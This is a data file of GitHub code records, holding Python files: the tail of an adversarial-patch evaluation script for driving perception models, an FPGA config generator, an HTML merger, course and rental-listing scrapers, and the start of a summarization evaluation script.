GenerationASR_RL/=N\n TotalASR_RL/=N\n \n MisMisMis_ASR/=N\n MdtMdtMdt_ASR/=N\n GenGenGen_ASR/=N\n AttAASR/=N\n TotalASR/=N\n\n \n file_note = open(\"MultiTaskTrain/ASR_odtsrl.txt\", 'w')\n file_note.write(\"各种攻击ASR\"+\n \"\\nMissingASR_TS: \"+str(MissingASR_TS)+\n \"\\nMisdetectASR_TS: \"+str(MisdetectASR_TS)+\n \"\\nGenerationASR_TS: \"+str(GenerationASR_TS)+\n \"\\nTotalASR_TS: \"+str(TotalASR_TS)+\n \"\\n\"+\n \"\\nMissingASR_OD: \"+str(MissingASR_OD)+\n \"\\nMisdetectASR_OD: \"+str(MisdetectASR_OD)+\n \"\\nGenerationASR_OD: \"+str(GenerationASR_OD)+\n \"\\nTotalASR_OD: \"+str(TotalASR_OD)+\n \"\\n\"+\n \"\\nMissingASR_RL: \"+str(MissingASR_RL)+\n \"\\nMisdetectASR_RL: \"+str(MisdetectASR_RL)+\n \"\\nGenerationASR_RL: \"+str(GenerationASR_RL)+\n \"\\nTotalASR_RL: \"+str(TotalASR_RL)+\n \"\\n\"+\n \"\\nMisMisMis: \"+str(MisMisMis_ASR)+\n \"\\nMdtMdtMdt_ASR: \"+str(MdtMdtMdt_ASR)+\n \"\\nGenGenGen_ASR: \"+str(GenGenGen_ASR)+\n \"\\nAttAASR: \"+str(AttAASR)+\n \"\\nTotalASR: \"+str(TotalASR)\n )\n file_note.close()\n\nif __name__ == \"__main__\":\n\n # TS 模型参数\n sign_classes = 115\n classes_weights_path_TS = \"MultiTaskTrain/ALL_sign_data/checkpoints/model_acc_97__class_115_epoch_10.pt\"\n \n # OD 模型参数\n kitti_weights = 'MultiTaskTrain/weights_OD/yolov3-kitti.weights'\n \n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image_folder_TS\", type=str, default=\"MultiTaskTrain/demo/TSD\", help=\"path to dataset\")\n parser.add_argument(\"--model_def_TS\", type=str, default=\"MultiTaskTrain/config_TS/ALL_DATA.cfg\", help=\"path to model definition file\")\n parser.add_argument(\"--weights_path_TS\", type=str, default=\"MultiTaskTrain/checkpointsTS/yolov3_ckpt_33.pth\", help=\"path to weights file\")\n parser.add_argument(\"--class_path_TS\", type=str, default=\"MultiTaskTrain/ALL_sign_data/ALL_data_in_2_train/names.txt\", help=\"path to class label file\")\n\n parser.add_argument('--image_folder_OD', type=str, default='MultiTaskTrain/demo/OD', help='path to dataset')\n parser.add_argument('--config_path_OD', type=str, default='MultiTaskTrain/config_OD/yolov3-kitti.cfg', help='path to model config file')\n parser.add_argument('--weights_path_OD', type=str, default=kitti_weights, help='path to weights file')\n parser.add_argument('--class_path_OD', type=str, default='MultiTaskTrain/data_OD/kitti.names', help='path to class label file')\n \n parser.add_argument(\"--image_path_RL\", type=str, default=\"MultiTaskTrain/demo/RL/96.jpg\", help=\"Path to demo img\")\n parser.add_argument(\"--image_folder_RL\", type=str, default=\"MultiTaskTrain/demo/RL\", help=\"Path to demo img\")\n parser.add_argument(\"--weight_path_RL\", type=str, default=\"MultiTaskTrain/weight_RL/exp0/exp0_best.pth\",help=\"Path to model weights\")\n \n parser.add_argument(\"--conf_thres\", type=float, default=0.8, help=\"object confidence threshold\")\n parser.add_argument(\"--nms_thres\", type=float, default=0.4, help=\"iou thresshold for non-maximum suppression\")\n parser.add_argument(\"--batch_size\", type=int, default=1, help=\"size of the batches\")\n parser.add_argument(\"--n_cpu\", type=int, default=1, help=\"number of cpu threads to use during batch generation\")\n \n parser.add_argument(\"--img_size_TS\", type=int, default=512, help=\"size of each image dimension\")\n parser.add_argument('--img_size_OD', type=int, default=416, help='size of each image dimension')\n \n # 其他训练参数\n parser.add_argument('--epochs', type=int, default=100)\n parser.add_argument('--lr', type=float, default=100, help='learning rate')\n parser.add_argument('--patch_size', nargs='+', type=int, default=[40,40], help='[min_train, max-train, test]')# [y,x]\n parser.add_argument('--patch_pos_TS', nargs='+', type=int, default=[270,100], help='[min_train, max-train, test]') \n parser.add_argument('--patch_pos_OD', nargs='+', type=int, default=[270,100], help='[min_train, max-train, test]') \n parser.add_argument('--patch_pos_RL', nargs='+', type=int, default=[200,215], help='[min_train, max-train, test]') \n\n opt = parser.parse_args()\n\n print(opt) \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n Tensor = torch.cuda.FloatTensor if torch.cuda.is_available() else torch.FloatTensor\n\n # Set up TS model\n model_TS = Darknet_TS(opt.model_def_TS, img_size=opt.img_size_TS).to(device)\n\n model_TS.load_state_dict(torch.load(opt.weights_path_TS))\n\n classes_TS = load_classes_TS(opt.class_path_TS) # Extracts class labels from file\n\n # to class\n model_class_TS = ResNet18(sign_classes)\n model_class_TS.load_state_dict(torch.load(classes_weights_path_TS))\n model_class_TS.to(device)\n model_class_TS.eval()\n\n # pics dir\n crop_dirs_TS = \"MultiTaskTrain/demo/TSD\"\n crop_dirs_OD = \"MultiTaskTrain/demo/OD\"\n crop_dirs_RL = \"MultiTaskTrain/demo/RL\"\n \n \n # set up OD model\n cmap = plt.get_cmap('tab20b') # 设置框的颜色\n colors = [cmap(i) for i in np.linspace(0, 1, 100)]\n\n model_OD = Darknet_OD(opt.config_path_OD, img_size=opt.img_size_OD)\n model_OD.load_weights(opt.weights_path_OD)\n print('model path: ' +opt.weights_path_OD)\n model_OD.cuda()\n\n model_OD.eval() # Set in evaluation mode\n \n classes_OD = load_classes_OD(opt.class_path_OD) # Extracts class labels from file\n\n # 一些模参数\n resize_shape=(512, 288)\n net = SCNN(input_size=resize_shape, pretrained=False)\n mean=(0.3598, 0.3653, 0.3662) # CULane mean, std\n std=(0.2573, 0.2663, 0.2756)\n transform_img = Resize(resize_shape)\n transform_to_net = Compose(ToTensor(), Normalize(mean=mean, std=std))\n \n # 加载model\n save_dict = torch.load(opt.weight_path_RL, map_location='cpu')\n net.load_state_dict(save_dict['net'])\n net.to(device)\n net.eval()\n\n model_RL = SegmentationModelOutputWrapper(net)\n\n Run_ODTSRL() \n","repo_name":"qingjiesjtu/ATTA","sub_path":"MultiTaskTrain/AoA_odtsrl.py","file_name":"AoA_odtsrl.py","file_ext":"py","file_size_in_byte":54379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27704855192","text":"Inc('dfaccto/util.py', abs=True)\nInc('dfaccto/axi.py', abs=True)\nInc('dfaccto/event.py', abs=True)\nInc('dfaccto/reg.py', abs=True)\n\n\nclass _OCAccel(ModuleContext):\n\n def __init__(self):\n ModuleContext.__init__(self)\n self._read_config()\n self._setup_oneshots()\n\n def _read_config(self):\n import os\n self.ContextBits = 9\n self.InterruptBits = 64\n self.Ctrl_DataBytes = 4\n self.Ctrl_AddrBits_Ctx = 32\n self.Ctrl_AddrBits_NoCtx = self.Ctrl_AddrBits_Ctx - self.ContextBits - 1 # bit 31 always 0 (selects global vs action register space)\n self.Host_DataBytes = 64 if os.environ.get('ACTION_HALF_WIDTH', False) else 128\n self.Host_AddrBits = 64\n self.Host_IdBits = os.environ.get('AXI_ID_WIDTH', 5)\n self.Host_UserBits = 1\n self.Ddr_DataBytes = 64\n self.Ddr_AddrBits = 33\n self.Ddr_IdBits = 4\n self.Ddr_UserBits = 1\n self.DdrEnabled = 'ENABLE_DDR' in os.environ\n self.Hbm_DataBytes = 32\n self.Hbm_AddrBits = 34\n self.Hbm_IdBits = 4\n self.Hbm_UserBits = 1\n self.HbmEnabled = 'ENABLE_HBM' in os.environ\n self.HbmCount = int(os.environ.get('HBM_AXI_IF_NUM', '1'))\n self.Eth_DataBytes = 64\n self.Eth_UserBits = 1\n self.EthEnabled = os.environ.get('ETHERNET_USED', 'FALSE') == 'TRUE'\n\n def _setup_oneshots(self):\n self._register_oneshot('pkg',\n lambda self: Pkg('dfaccto_ocaccel',\n x_templates={self.File('generic/package.vhd.tpl'): self.File('pkg/dfaccto_ocaccel.vhd')}))\n self._register_oneshot('tCtrlCtx',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiCtrlCtx',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_Ctx,\n has_burst=False)))\n self._register_oneshot('tCtrl',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiCtrl',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_NoCtx,\n has_burst=False)))\n self._register_oneshot('tCtrlRegCtx',\n lambda self: self._in_pkg(\n lambda self: Reg.TypePort('CtrlRegCtx',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_Ctx)))\n self._register_oneshot('tCtrlReg',\n lambda self: self._in_pkg(\n lambda self: Reg.TypePort('CtrlReg',\n data_bytes=self.Ctrl_DataBytes,\n addr_bits=self.Ctrl_AddrBits_NoCtx)))\n self._register_oneshot('tHost_ext',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHostExt',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits,\n has_attr=True,\n aruser_bits=self.ContextBits,\n awuser_bits=self.ContextBits,\n ruser_bits=self.Host_UserBits,\n wuser_bits=self.Host_UserBits,\n buser_bits=self.Host_UserBits)))\n self._register_oneshot('tHostCtx',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHostCtx',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits,\n aruser_bits=self.ContextBits,\n awuser_bits=self.ContextBits)))\n self._register_oneshot('tHost',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHost',\n data_bytes=self.Host_DataBytes,\n addr_bits=self.Host_AddrBits,\n id_bits=self.Host_IdBits)))\n self._register_oneshot('tDdr_ext',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiDdrExt',\n data_bytes=self.Ddr_DataBytes,\n addr_bits=self.Ddr_AddrBits,\n id_bits=self.Ddr_IdBits,\n has_attr=True,\n aruser_bits=self.Ddr_UserBits,\n awuser_bits=self.Ddr_UserBits,\n ruser_bits=self.Ddr_UserBits,\n wuser_bits=self.Ddr_UserBits,\n buser_bits=self.Ddr_UserBits)))\n self._register_oneshot('tDdr',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiDdr',\n data_bytes=self.Ddr_DataBytes,\n addr_bits=self.Ddr_AddrBits,\n id_bits=self.Ddr_IdBits)))\n self._register_oneshot('tHbm_ext',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHbmExt',\n data_bytes=self.Hbm_DataBytes,\n addr_bits=self.Hbm_AddrBits,\n id_bits=self.Hbm_IdBits,\n has_attr=True,\n aruser_bits=self.Hbm_UserBits,\n awuser_bits=self.Hbm_UserBits,\n ruser_bits=self.Hbm_UserBits,\n wuser_bits=self.Hbm_UserBits,\n buser_bits=self.Hbm_UserBits)))\n self._register_oneshot('tHbm',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeAxi('AxiHbm',\n data_bytes=self.Hbm_DataBytes,\n addr_bits=self.Hbm_AddrBits,\n id_bits=self.Hbm_IdBits)))\n self._register_oneshot('tEth',\n lambda self: self._in_pkg(\n lambda self: Axi.TypeStream('StmEth',\n data_bytes=self.Eth_DataBytes,\n user_bits=self.Eth_UserBits)))\n self._register_oneshot('tCtx',\n lambda self: self._in_pkg(\n lambda self: Util.TypeUnsigned('Context', width=self.ContextBits)))\n self._register_oneshot('tIntrSrc',\n lambda self: self._in_pkg(\n lambda self: Util.TypeUnsigned('InterruptSrc', width=self.InterruptBits)))\n self._register_oneshot('tIntrCtx',\n lambda self: self._in_pkg(\n lambda self: TypeC('InterruptCtx', x_is_interrupt=True,\n x_definition=self.Part('types/definition/interrupt.part.tpl'),\n x_format_ms=self.Part('types/format/interrupt_ms.part.tpl'),\n x_format_sm=self.Part('types/format/interrupt_sm.part.tpl'),\n x_wrapeport=self.Part('types/wrapeport/interrupt.part.tpl'),\n x_wrapeconv=self.Part('types/wrapeconv/interrupt.part.tpl'),\n x_wrapipmap=self.Part('types/wrapipmap/interrupt.part.tpl'),\n x_wrapigmap=None,\n x_tlogic=Util.tlogic,\n x_tctx=self.tCtx,\n x_tsrc=self.tIntrSrc,\n x_cnull=lambda t: Con('InterruptCtxNull', t, value=Lit({})))))\n self._register_oneshot('tIntr',\n lambda self: self._in_pkg(\n lambda self: Event.TypeEvent('Interrupt',\n stb_bits=self.InterruptBits)))\n self._register_oneshot('EntCtrlDemux',\n lambda self: Reg.EntDemux('OCAccelCtrlDemux',\n axi_type=OCAccel.tCtrl,\n reg_type=OCAccel.tCtrlReg,\n x_file=self.File('entity/ocaccel/CtrlDemux.vhd')))\n self._register_oneshot('EntRegFile',\n lambda self: Reg.EntFile('OCAccelRegFile',\n reg_type=self.tCtrlReg,\n x_file=self.File('entity/ocaccel/RegFile.vhd')))\n self._register_oneshot('EntControl',\n lambda self: Ent('OCAccelControl',\n Generic('StartCount', Util.tsize, label='gscount'),\n Generic('ExtIrqCount', Util.tsize, label='gicount'),\n Generic('ActionType', Util.tsize, label='gactyp'),\n Generic('ActionVersion', Util.tsize, label='gacver'),\n PortI('sys', Util.tsys, label='psys'),\n PortS('reg', self.tCtrlReg, label='preg'),\n PortM('intr', self.tIntr, label='pintr'),\n PortM('start', Event.tEvent , vector='StartCount', label='pstart'),\n PortS('irq', Event.tEvent, vector='ExtIrqCount', label='pirq'),\n x_ebarrier=Util.Barrier,\n x_earbiter=Util.ArbiterStable,\n x_eregfile=self.EntRegFile,\n x_util=Util.pkg_util,\n x_templates={self.File('entity/ocaccel/Control.vhd.tpl'): self.File('entity/ocaccel/Control.vhd')}))\n self._register_oneshot('EntSimplifyHost',\n lambda self: Axi.EntWiring('OCAccelSimplifyHost',\n master_type=self.tHost_ext,\n slave_type=self.tHostCtx,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyHost.vhd')))\n self._register_oneshot('EntSimplifyDdr',\n lambda self: Axi.EntWiring('OCAccelSimplifyDdr',\n master_type=self.tDdr_ext,\n slave_type=self.tDdr,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyDdr.vhd')))\n self._register_oneshot('EntSimplifyHbm',\n lambda self: Axi.EntWiring('OCAccelSimplifyHbm',\n master_type=self.tHbm_ext,\n slave_type=self.tHbm,\n master_mode='full',\n slave_mode='full',\n x_file=self.File('entity/ocaccel/SimplifyHbm.vhd')))\n self._register_oneshot('EntSingleContext',\n lambda self: Ent('OCAccelSingleContext',\n PortI('sysCtx', Util.tsys, label='psysc'),\n PortM('intrCtx', self.tIntrCtx, label='pintrc'),\n PortS('ctrlCtx', self.tCtrlCtx, label='pctrlc'),\n PortM('hostCtx', self.tHostCtx, label='phostc'),\n PortO('sys', Util.tsys, label='psys'),\n PortS('intr', self.tIntr, label='pintr'),\n PortM('ctrl', self.tCtrl, label='pctrl'),\n PortS('host', self.tHost, label='phost'),\n x_util=Util.pkg_util,\n x_templates={self.File('entity/ocaccel/SingleContext.vhd.tpl'): self.File('entity/ocaccel/SingleContext.vhd')}))\n\n def _in_pkg(self, func):\n with self.pkg:\n return func(self)\n\n def EntWrapper(self, name, single_context, x_file):\n psys_name = 'sysCtx' if single_context else 'sys'\n pintr_name = 'intrCtx' if single_context else 'intr'\n pctrl_name = 'ctrlCtx' if single_context else 'ctrl'\n shost_name = 'hostCtx' if single_context else 'host'\n\n ports = [PortI(psys_name, Util.tsys, x_wrapname='ap'),\n PortM(pintr_name, self.tIntrCtx, x_wrapname='interrupt'),\n PortS(pctrl_name, self.tCtrlCtx, x_wrapname='s_axi_ctrl_reg'),\n PortM('host_ext', self.tHost_ext, x_wrapname='m_axi_host_mem')]\n if self.DdrEnabled:\n ports.append(PortM('ddr', self.tDdr_ext, x_wrapname='m_axi_card_mem0'))\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n name = 'hbm{:d}'.format(i)\n wrapname = 'm_axi_card_hbm_p{:d}'.format(i)\n ports.append(PortM(name, self.tHbm_ext, x_wrapname=wrapname))\n if self.EthEnabled:\n ports.append(PortM('ethTx', self.tEth, x_wrapname='dout_eth'))\n ports.append(PortS('ethRx', self.tEth, x_wrapname='din_eth'))\n ports.append(PortO('ethRxRst', Util.tlogic, x_wrapname='eth_rx_fifo_reset'))\n ports.append(PortI('ethRxStatus', Util.tlogic, x_wrapname='eth_stat_rx_status'))\n ports.append(PortI('ethRxAligned', Util.tlogic, x_wrapname='eth_stat_rx_aligned'))\n\n ewrap = Ent(name, *ports,\n x_templates={self.File('generic/ext_wrapper.vhd.tpl'): x_file})\n with ewrap:\n Ins(self.EntSimplifyHost.name, 'simplifyHost',\n MapPort('master', S('host_ext')),\n MapPort('slave', S(shost_name)))\n if self.DdrEnabled:\n Ins(self.EntSimplifyDdr.name, 'simplifyDdr',\n MapPort('master', S('ddr_ext')),\n MapPort('slave', S('ddr')))\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n Ins(self.EntSimplifyHbm.name, 'simplifyHbm{:d}'.format(i),\n MapPort('master', S('hbm{:d}_ext'.format(i))),\n MapPort('slave', S('hbm{:d}'.format(i))))\n if single_context:\n Ins(self.EntSingleContext.name, 'singleContext',\n MapPort('sysCtx', S(psys_name)),\n MapPort('intrCtx', S(pintr_name)),\n MapPort('ctrlCtx', S(pctrl_name)),\n MapPort('hostCtx', S(shost_name)),\n MapPort('sys', S('sys')),\n MapPort('intr', S('intr')),\n MapPort('ctrl', S('ctrl')),\n MapPort('host', S('host')))\n\n S('host').set_default((self.tHost if single_context else self.tHostCtx).x_cnull)\n if self.DdrEnabled:\n S('ddr').set_default(self.tDdr.x_cnull)\n if self.HbmEnabled:\n for i in range(self.HbmCount):\n S('hbm{:d}', expand=i).set_default(self.tHbm.x_cnull)\n return ewrap\n\nOCAccel = _OCAccel()\n","repo_name":"lw0/dfaccto_lib","sub_path":"cfg/ocaccel.py","file_name":"ocaccel.py","file_ext":"py","file_size_in_byte":12449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70338833192","text":"from bs4 import BeautifulSoup\r\n\r\n# List of file names to merge\r\nfiles = [\"Explorer.html\", \"HexapodController.html\", \"HexapodExplorer.html\", \"HexapodRobot.html\"]\r\n\r\n# Read the contents of each file into a BeautifulSoup object\r\nsoups = [BeautifulSoup(open(file), \"html.parser\") for file in files]\r\n\r\n# Merge the contents of all BeautifulSoup objects into one\r\nmerged_soup = BeautifulSoup(\"\", \"html.parser\")\r\nfor soup in soups:\r\n merged_soup.append(soup)\r\n\r\n# Write the merged content to a new file\r\nwith open(\"../Documentation.html\", \"w\") as outfile:\r\n outfile.write(str(merged_soup))","repo_name":"malek-luky/Artificial-Intelligence-in-Robotics","sub_path":"Semester_Project/docs/merge_script.py","file_name":"merge_script.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73917312551","text":"from lib2to3.pgen2 import driver\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import NoSuchElementException \r\nimport time\r\nimport pandas as pd\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\n\r\ndef scrape_classes():\r\n\r\n df = pd.DataFrame(columns=['Campus','Year','Season','Department','Course code','Name','Credits','Pre-reqs','Co-reqs','Restrictions','Pre-req string','Description','URL'])\r\n\r\n browser = webdriver.Chrome()\r\n browser.get(\"https://courses.students.ubc.ca/cs/courseschedule\")\r\n browser.find_element(By.XPATH,\"//button[contains(text(),'Campus')]\").click()\r\n time.sleep(1)\r\n elem_campuses = browser.find_elements(By.XPATH,\"//ul[@class='dropdown-menu']//descendant::a[contains(@title,'UBC')]\")\r\n i = 0\r\n string_campuses = list()\r\n for elem_campus in elem_campuses:\r\n string_campuses.append(elem_campus.get_attribute(\"title\"))\r\n\r\n for string_campus in string_campuses: \r\n browser.find_element(By.XPATH,\"//button[contains(text(),'Session')]\").click()\r\n time.sleep(1)\r\n elem_sessions = browser.find_elements(By.XPATH,\"//ul[@class='dropdown-menu']//descendant::a[contains(@title,'20')]\")\r\n\r\n string_sessions = list()\r\n for elem_session in elem_sessions:\r\n string_sessions.append(elem_session.text)\r\n\r\n for string_session in string_sessions:\r\n season = string_session.split(\" \")[1][0]\r\n year = string_session.split(\" \")[0]\r\n browser.get(\"https://courses.students.ubc.ca/cs/courseschedule?tname=subj-all-departments&sessyr={}&sesscd={}&campuscd={}&pname=subjarea\".format(year,season,string_campus))\r\n \r\n try:\r\n elem_depts = browser.find_elements(By.XPATH,\"//tr[contains(@class,'section')]\") \r\n except NoSuchElementException:\r\n continue\r\n \r\n string_depts = list()\r\n for elem_dept in elem_depts:\r\n string_depts.append(elem_dept.text)\r\n\r\n for string_dept in string_depts: \r\n if '*' in string_dept:\r\n continue\r\n dept_code = string_dept.split(\" \")[0]\r\n browser.get(\"https://courses.students.ubc.ca/cs/courseschedule?tname=subj-department&sessyr={}&sesscd={}&campuscd={}&dept={}&pname=subjarea\".format(year,season,string_campus,dept_code))\r\n elem_courses = browser.find_elements(By.XPATH,\"//tr[contains(@class,'section')]\")\r\n\r\n string_courses = list()\r\n for elem_course in elem_courses:\r\n string_courses.append(elem_course.text)\r\n\r\n\r\n for string_course in string_courses:\r\n course_num = string_course.split(\" \")[1]\r\n url = \"https://courses.students.ubc.ca/cs/courseschedule?sesscd={}&campuscd={}&pname=subjarea&tname=subj-course&course={}&sessyr={}&dept={}\".format(season,string_campus,course_num,year,dept_code)\r\n browser.get(url)\r\n\r\n \r\n pre_reqs = list()\r\n pre_req_str = \"\"\r\n try:\r\n elem_pre_reqs = browser.find_elements(By.XPATH,\"//p[contains(text(),'Pre-reqs:')]//descendant::a\")\r\n pre_req_str = browser.find_element(By.XPATH,\"//p[contains(text(),'Pre-reqs:')]\").text\r\n for elem_pre_req in elem_pre_reqs:\r\n pre_reqs.append(elem_pre_req.text)\r\n except:\r\n pass\r\n\r\n co_reqs = list()\r\n try:\r\n elem_co_reqs = browser.find_elements(By.XPATH,\"//p[contains(text(),'Co-reqs:')]//descendant::a\")\r\n for elem_co_req in elem_co_reqs:\r\n co_reqs.append(elem_co_req.text)\r\n except:\r\n pass\r\n \r\n name = browser.find_element(By.XPATH,\"//h4\").text\r\n desc = browser.find_element(By.XPATH,\"//div[@role = 'main']/descendant::p[1]\").text\r\n credits = browser.find_element(By.XPATH,\"//p[contains(text(),'Credits:')]\").text.split(':')[1]\r\n\r\n try:\r\n restrictions = browser.find_element(By.XPATH,\"//li[contains(text(),'restricted to students')]\").text\r\n except:\r\n pass\r\n\r\n str_co_reqs = \"\"\r\n\r\n for co_req in co_reqs:\r\n str_co_reqs = str_co_reqs + co_req + \",\"\r\n\r\n \r\n str_pre_reqs = \"\"\r\n\r\n for pre_req in pre_reqs:\r\n str_pre_reqs = str_pre_reqs + pre_req + \",\"\r\n\r\n df.loc[len(df.index)]=[string_campus,year,season,dept_code,course_num,name,credits,str_pre_reqs[:-1],str_co_reqs[:-1],restrictions,pre_req_str,desc,url]\r\n print(str(round((i/9657)*100,2)) + \"%\")\r\n i +=1\r\n \r\n df.to_csv(\"courses.csv\")\r\n\r\nscrape_classes()\r\n\r\n","repo_name":"Ferdinand737/UBC-Course-Bot","sub_path":"Scrape.py","file_name":"Scrape.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1654252288","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport re, datetime, os, pickle, time\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\noptions = Options()\noptions.headless = True\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-gpu')\n\n\ndef haaglanden_aanbod():\n current_time = datetime.datetime.now()\n\n chromedriver_location = os.path.join(os.path.dirname(__file__), 'chromedriver')\n #laden van de website met Selenium en een timeout\n driver = webdriver.Chrome(options=options,\n executable_path=chromedriver_location)\n driver.get('https://www.woonnet-haaglanden.nl/aanbod/te-huur#?ik-zoek-een=1&gesorteerd-op=publicatiedatum-')\n timeout = 4\n try:\n element_present = EC.presence_of_element_located((By.ID, 'main'))\n WebDriverWait(driver, timeout).until(element_present)\n except TimeoutException:\n print(\"Timed out for Haaglanden_overzicht\")\n finally:\n print(\"Page loaded\")\n\n #laden van de database\n if os.path.isfile('cache_folder/database_haaglanden.txt'):\n with open('cache_folder/database_haaglanden.txt', 'rb') as f:\n database = pickle.load(f)\n else:\n database = []\n\n # scroll naar het einde van de pagina om alle container te laden.\n SCROLL_PAUSE_TIME = 0.5\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(SCROLL_PAUSE_TIME)\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n time.sleep(2)\n\n containers = driver.find_elements_by_xpath(\"//ng-include[@class='ng-scope']\")\n #scraping van de containers op de website\n entries = []\n for x in range(0, len(containers)):\n string = re.sub(r'\\n|\\t|', '', containers[x].get_attribute('innerHTML').strip())\n string = re.split('<|>', string)\n if True in [(\"ng-href\" in x) for x in string]:\n index = [(\"ng-href\" in x) for x in string].index(True)\n page_url = re.split('\\\"|\\\"', string[index])[1]\n page_url = \"https://www.woonnet-haaglanden.nl{}\".format(page_url)\n raw_adres = 'span ng-bind-html=\"::object.street\" class=\"ng-binding\"'\n adres = string[string.index(raw_adres) + 1] if raw_adres in string else ''\n adres += string[string.index(raw_adres) + 3] if raw_adres in string else ''\n raw_plaats = 'span class=\"address-part ng-binding ng-scope\" ng-if=\"::!hideAdresCity\"'\n plaats = string[string.index(raw_plaats) + 1] if raw_plaats in string else ''\n raw_prijs = 'span class=\"prijs ng-binding ng-scope\" ng-if=\"::!toonAangepasteHuurprijs(object)\"'\n prijs = string[string.index(raw_prijs) + 1].replace(' ','') if raw_prijs in string else ''\n raw_type_verhuur = 'span class=\"object-label-value ng-scope\" translate=\"ModelCategorie'\n index_type_verhuur = [(raw_type_verhuur in x) for x in string]\n type_verhuur = string[index_type_verhuur.index(True) + 1] if True in index_type_verhuur else ''\n raw_omschrijving = 'span class=\"icon-icon_woonoppervlakte object-label-icon\"'\n omschrijving = string[string.index(raw_omschrijving) + 5] if raw_omschrijving in string else ''\n entry = [adres, omschrijving, plaats, prijs, type_verhuur, page_url]\n\n #vergelijk deze entry met de database en als de entry nog niet voorkomt in de database, dan alleen toevoegen aan entries en uiteindelijk de database\n if entry not in database and entry.count('') < 2:\n entries.append(entry)\n database.append(entry)\n\n if len(entries) > 0:\n with open('cache_folder/database_haaglanden.txt', 'wb') as f:\n pickle.dump(database, f)\n\n if os.path.isfile('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day)):\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'rb') as f:\n cache = pickle.load(f)\n cache.extend(entries)\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'wb') as f:\n pickle.dump(cache, f)\n else:\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'wb') as f:\n pickle.dump(entries, f)\n driver.quit()\n return entries\n\ndef aanbod_message():\n current_time = datetime.datetime.now()\n if os.path.isfile('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day)):\n with open('cache_folder/{}{}_haaglanden_overzicht.txt'.format(current_time.month, current_time.day), 'rb') as f:\n input = pickle.load(f)\n else:\n input = haaglanden_aanbod()\n message = ''\n if len(input) > 0:\n #limit message length\n max_entries = len(input) if len(input) < 15 else 14\n for x in range(0, max_entries):\n message += \"\\n\\n{} in {}\\n{} voor {}\\n{}\".format(input[x][5], input[x][0], input[x][2], input[x][1], input[x][3], input[x][4])\n else:\n message = 'Er zijn geen (nieuwe) woningen gevonden vandaag.'\n return message\n","repo_name":"kcvanderlinden/Woonnet_bot","sub_path":"Haaglanden_overzicht.py","file_name":"Haaglanden_overzicht.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4757019425","text":"import itertools\nimport os\nos.environ['TOKENIZERS_PARALLELISM'] = 'false'\nimport ujson\n\nimport pandas as pd\nimport argparse\nimport spacy\nimport numpy as np\nfrom scipy.stats import pearsonr\nimport torch\nfrom transformers import AutoTokenizer\nfrom tqdm import tqdm\nfrom scipy.special import expit\n\nfrom data_utils import get_path_from_exp\nfrom eval.rouge_metric import RougeMetric\nfrom preprocess.convert_abstractive_to_extractive import gain_selection\nfrom gen_transformers.model import TransformerSummarizer\nfrom gen_transformers.model_utils import sentence_mask\nfrom preprocess.extract_oracles import convert_to_sents\nfrom datasets import load_dataset\n\nos.environ['ROUGE_HOME'] = os.path.expanduser('~/faith-sum/eval/ROUGE-1.5.5/')\nnp.random.seed(1992)\n\n\ndef compute_rouge(generated, gold, rouge_metric, prefix=''):\n outputs = rouge_metric.evaluate_batch(generated, gold, aggregate=True)['rouge']\n f1s = []\n stats = {}\n for rouge_type in ['1', '2', 'L']:\n fscore = outputs[f'rouge_{rouge_type.lower()}_f_score']\n stats[f'{prefix}rouge{rouge_type}_precision'] = 